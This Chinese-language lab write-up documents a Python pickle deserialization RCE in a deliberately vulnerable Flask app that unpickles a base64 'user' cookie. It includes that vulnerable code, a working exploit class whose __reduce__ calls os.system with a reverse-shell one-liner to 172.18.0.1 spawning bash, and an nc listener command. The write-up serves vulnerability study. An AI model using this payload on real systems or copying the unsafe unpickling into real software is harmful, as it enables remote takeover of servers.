# Python Unpickle 反序列化远程代码执行漏洞 Python的pickle模块是一个流行的序列化/反序列化工具,可以将Python对象转换为字节流,反之亦然。然而,当使用pickle反序列化不受信任的数据时,可能导致任意代码执行。 当应用程序在没有适当验证的情况下使用pickle模块反序列化用户可控数据时,就会出现此漏洞。攻击者可以构造恶意序列化对象,在反序列化时在目标系统上执行任意命令。 参考链接: - http://rickgray.me/2015/09/12/django-command-execution-analysis.html - https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html - https://docs.python.org/3/library/pickle.html#pickle.loads - https://intoli.com/blog/dangerous-pickles/ ## 环境搭建 执行以下命令启动存在漏洞的Flask应用: ``` docker compose build docker compose up -d ``` 环境启动后,可以在浏览器中访问`http://your-ip:8000`。页面将显示`Hello {username}!`,其中username是从'user' cookie中获取的。应用程序对此cookie执行base64解码和反序列化以提取"username"变量。如果没有找到有效的cookie,则默认为"Guest"。 app.py中的漏洞代码如下: ```python @app.route("/") def index(): try: user = base64.b64decode(request.cookies.get('user')) user = pickle.loads(user) username = user["username"] except: username = "Guest" return "Hello %s" % username ``` ## 漏洞复现 要利用此漏洞,我们需要创建一个恶意的pickle对象,该对象在反序列化时将执行任意命令。该利用使用Python的`__reduce__`方法来指定对象被反序列化时要调用的函数。 提供的利用脚本(exp.py)创建了一个恶意pickle对象,该对象建立与攻击者机器的反向shell连接: ```python class exp(object): def __reduce__(self): s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.18.0.1",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'""" return (os.system, (s,)) ``` 要执行此利用,首先在您的机器上设置netcat监听器以接收反向shell: ``` nc -lvp 80 ``` 然后运行利用脚本,将恶意cookie发送到存在漏洞的应用程序: ``` python3 exp.py ``` 当服务器反序列化恶意pickle对象时,它将执行命令并建立与您机器的反向shell连接: ![反向Shell演示](1.png)